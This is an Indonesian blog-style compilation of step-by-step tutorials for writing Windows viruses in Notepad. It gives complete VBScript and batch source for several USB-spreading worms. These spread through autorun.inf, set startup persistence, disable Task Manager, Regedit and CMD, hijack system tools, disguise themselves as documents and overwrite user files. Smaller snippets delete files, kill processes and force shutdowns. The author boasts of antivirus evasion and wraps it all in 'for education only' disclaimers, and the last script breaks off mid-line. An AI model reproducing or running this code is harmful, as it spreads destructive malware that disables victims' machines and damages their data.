cara membuat viruz melalui notepad
Cara” membuat virus melalui notepad
1. Memasukkan virus kedalam flasdis
11 desember 2009
Penulis: verdhy • Kategori Artikel: Cracking, Virus
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : verdhy.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
=====================================================================
2. Virus yang satu ini harus disimpan dengan nama ‘’verdhy.exe.vbs’’ (tanpa tanda petik)
AWAS…!!!!
virus ini sangat berbahaya…
apapun yang terjadi bukan tanggungan saya…
Klik star buka run lau klik notepad atau bias juga langsung dengan buka notepad
Lalu copy paste scrip di table ini
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
loop
Jangan lupa di save dengan mengklik FILE-SAVE tuli namanya ‘’verdhy.exe.vbs’’
================================================================
3. Virus ini efeknya gak terlalu bahaya …
Evek dari virus ini Cuma mengganti tampilan dari windows …
Tetapi cukup bikin kaget juga …!!!
Tapi yang penting tidak terdeteksi sama anti virus (setau saya)
Ini hanya bias bekerja pada WINDOWS XP
Caranya:
-buka notepad lalu tulis (copy paste … tapi di edit dulu yaa … ) scrip didalam table ini
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (verdhy.bat)
- buat Autorun.inf dengan script:
[autorun]
open=verdhy.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
Catatan:
1. Ini hanya untuk pembelajaran saja
2. Kami tidak bertanggung jawab atas penyalah gunaan Artikel di atas
3. Selamat bersenang-senang
note:
- jangan disalahgunakan …
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir …
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi …
- kalau mau buat anti virusnya tinggal di modifikasi nilainya …
Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281
4. Virus adalah suatu hal yang pasti tidak disukai orang banyak,maka biasanya kalau kompi kena Virus,Ufh menyebalkan banget kan ???
Maka tidak ada salahnya kita buat virus kecil-kecilan,karena hal kecil bisa menjadi yang besar. Sekalian tambah wawasan mengenai seluk beluk “Si Perusak” alias viruszz …
karena belajar itu menyenangkan apalagi yang iseng-iseng. [hheeheee]
Oke langsung tancep aja, cuy .,….
1. Buka Notepad [ terserah lewat mana saja bisa kok,missal di Run>> ketik Notepad>>bLAA udh Kan???
Copy script dibawah ini . . .
Rem sidoarjocity4154802560
On Error Resume Next
Dim Reg, fso, Induk
Set Reg = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set Induk = fso.GetFile(Wscript.ScriptFullName)
If Induk <> Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
If fso.fileExists(Left(Induk, Len(Induk) - 4)) Then
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & Left(Induk, len(Induk)-3) & chr(34))
Else
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & chr(34))
End If
End If
AutoFlash
Sebar1
Sebar2
Samar
Pertahanan
ShortCut
SerangFile (Left(Induk, InStrRev(Induk, " \ ")))
SerangFolder (Left(Induk, InStrRev(Induk, " \ ")))
SerangDrive("c:\")
SerangDrive("d:\")
SerangDrive("e:\")
SerangDrive("f:\")
SerangDrive("g:\")
AlwaysRun
SerangRecent
Sub AutoFlash
On Error Resume Next
Dim flashdrive, auto, tf1, tf2
For Each flashdrive In fso.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
Set auto = fso.CreateTextFile(flashdrive.Path & ("\AutoRun.inf"), True)
auto.Write ("[autorun]"& vbcrlf & "shellexecute=wscript.exe sidoarjo hot.vbs")
auto.Close
set tf1=fso.getfile(flashdrive.path & "\AutoRun.inf")
tf1.Attributes = 32
Induk.Copy (flashdrive.Path & "\sidoarjo hot.vbs")
set tf2=fso.getfile(flashdrive.path & "\sidoarjo hot.vbs")
tf2.Attributes = 32
End If
Next
End Sub
Sub SerangDrive (Lokasi)
On Error Resume Next
Dim drv
If fso.DriveExists(Lokasi) Then
Set drv = fso.GetDrive(fso.GetDriveName(Lokasi))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
CopyVbs (Lokasi & "\lapindo.vbs")
SerangFolder (Lokasi)
End If
End If
End Sub
Sub SerangFolder (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\bacalah aku.vbs")
SerangFile (target)
SerangFolder2 (target)
Next
End Sub
Sub SerangFolder2 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\duit.vbs")
SerangFile (target)
SerangFolder3 (target)
Next
End Sub
Sub SerangFolder3 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\Hasil rapat.vbs")
SerangFile (target)
Next
End Sub
Sub SerangFile (Lokasi)
On Error Resume Next
Dim target
For Each target In fso.GetFolder(Lokasi).Files
If lcase(Right(target,3))="doc" then
if Left(target,2)<> "~$" then CopyVbs(target & ".vbs")
HilangFile (target)
End If
If lcase(Right(target,3))="xls" or lcase(Right(target,3))="ppt" or lcase(Right(target,3))="pdf" or lcase(Right(target,3))="rtf" or lcase(Right(target,3))="rar" or lcase(Right(target,3))="zip" or lcase(Right(target,3))="jpg" or lcase(Right(target,3))="gif" or lcase(Right(target,3))="bmp" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-3) & "vbs")
End If
If lcase(Right(target,4))="docx" or lcase(Right(target,4))="xlsx" or lcase(Right(target,4))="pptx" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-4) & "vbs")
End If
if lcase(Right(target,3))="vbs" then KillVBS(target)
Next
End sub
Sub Pertahanan
On Error Resume Next
Reg.RegWrite "HKCR\inffile\shell\Install\command\", "logoff.exe"
Reg.RegWrite "HKCR\regfile\shell\open\command\", "logoff.exe"
Reg.RegWrite "HKCR\VBSFile\Shell\Edit\Command\", "logoff.exe"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "0", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr", "1", "REG_DWORD"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","Notepad.exe"
End Sub
Sub Samar
On Error Resume Next
Dim HandleDoc, HandleVbs
HandleDoc = "HKEY_CLASSES_ROOT\" & BacaHandle("doc")
HandleVbs = "HKEY_CLASSES_ROOT\" & BacaHandle("VBS")
Reg.RegWrite HandleVbs & "\", Reg.RegRead(HandleDoc & "\")
Reg.RegWrite HandleVbs & "\DefaultIcon\", Reg.RegRead(HandleDoc & "\DefaultIcon\")
Reg.RegWrite HandleVbs & "\NeverShowExt",""
Reg.RegWrite "HKCR\VBSFile\FriendlyTypeName", Reg.RegRead(HandleDoc & "\")
End Sub
Sub ShortCut
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders("Favorites") & "\blukutuk.lnk"
Set lnk = Reg.CreateShortCut(lok)
Induk.Copy (Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.TargetPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.Save
HilangFile (lok)
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\blukutuk", lok
End Sub
Sub HilangFile (AlamatFile)
Dim f1
Set f1 = fso.GetFile(AlamatFile)
f1.Attributes = 6
End sub
Sub CopyVbs (Alamat)
On Error Resume Next
Dim data, ts, s, a, tf
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTextFile(Induk, 1)
a = ts.ReadAll
s = Right(a, Len(a) -28)
ts.Close
Set tf = fso.CreateTextFile(Alamat, True)
tf.WriteLine ("Rem sidoarjocity" & data)
tf.Write s
tf.Close
Set ts = fso.GetFile(Alamat)
ts.Attributes = 1
End sub
Function BacaHandle(TipeFile)
BacaHandle = reg.RegRead ("HKEY_CLASSES_ROOT\." & TipeFile & "\")
End Function
Sub KillVBS(alamat)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTextFile(alamat, 1)
s = ts.Readline
ts.Close
a = instr(s, "sidoarjocity")
If a = 0 Or a = "" Then
Set ts = fso.GetFile(alamat)
ts.Attributes = 0
Set ts = fso.openTextFile(Induk, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTextfile(alamat, True)
ts.Write i
ts.Close
End If
End sub
sub AlwaysRun
On Error Resume Next
Dim mf, check
If Wscript.ScriptFullname = Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
Do
Set mf = fso.getfile(Wscript.ScriptFullname)
check = mf.Drive.drivetype
If check <> 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
AutoFlash
Sebar1
SerangDrive("d:\")
SerangDrive("e:\")
Loop While check <> 1
End If
End sub
Sub Sebar1
dim nilai
nilai=Left(Reg.SpecialFolders("Desktop"),3) & "Windows\System.vbs"
CopyVBS (nilai)
HilangFile(nilai)
SerangFolder(Reg.SpecialFolders("MyDocuments"))
CopyVbs(Reg.SpecialFolders("NetHood") & "\Ceritaku.txt.vbs")
End Sub
Sub SerangRecent
On Error Resume Next
Dim target, ok
For Each target in fso.GetFolder(Reg.SpecialFolders("Recent")).Files
Set ok = reg.CreateShortCut(target)
if fso.FolderExists(ok.WorkingDirectory) then SerangFolder (ok.WorkingDirectory)
Next
End sub
Rem Created by Vir.VBS Generator V.1
2. Kalau udah selesai di copy paste aja di notepad, jadi gak perlu nulis sak’abreg gtu . .
3. Kemudian simpan [File>>Save As] kasih nama “Lapindo.vbs” [Inget harus pake tanda kutip,jangan lupa]
4.Jadi dech tuch virus, kalau kamu klik [jangan dech,agak berbahaya soalnya]
Catatan:
Kalau kamu pake Anti Virus Avira [yang gambar red umbrella] maka langsung kedetect dengan nama VBS/Autorun.T . . .
Terus kalau kamu coba klik, maka sesuai namanya “Lapindo” kompi kamu yang pake anti virus AVG.Avira,Norton akan ditenggelamin alias gak fungsi lagi…
Dan masih banyak efek lainnya
So becareful
Akhirnya cukup sudah penjelasan mengenai buat virus pake notepad,dan inget aturan mainnya For Education Only. . . Kalau ada yang tertarik,lain kali buat lagi yang lebih ganaszzz, hehheheeh
1.mendisable registry
1.Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\poli cies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kayak gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT _USER\software\microsoft\windows\currentversion\po licies\systemdisableregistrytools", 1, "REG_DWORD"
2.save dengan nama yang kmska.vbs
2.Membuat Virus yang Dapat Mengopykan Diri Ke Derektory Lain
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfil e wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
2.simpan dengan nama yg km ska.vbs
3.Membuat Virus Pembunuh Proses
Masuk Notepad kemudian tulis script di bawah ini :
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
2.save eksistensinya vbs
4.Menjalankan Virus Pada Saat Startup Atau Saat Windows Dihidupkan
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\Curr entVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
2.simpan dalam bentuk eksistensi reg(caranya sma ama vbs)
5.Membuat Virus Yang Dapat Menghapus File/Folder
Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs
6.Membuat Virus Yang Dapat Merestart Windows
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon
Simpan script tersebut dalam bentuk file.vbs, misal: virusrestart.vbs
7.Membuat Virus Yang Dapat Men-Shutdown Dan Merestart Windows
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("WScript.Shell").run "shutdown -s -f -t 60", vbhide
Mematikan windows dalam waktu 60 sekon
“shutdown -s -f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart
Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs
*bila virus tidak jalan coba periksa kembali spasi ama tanda kutipnya*
VIRUS NOTEPAD ERCAN-X
Caranya sama dengan yang sebelumnya copy paste kata-kata dibawah ini
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite 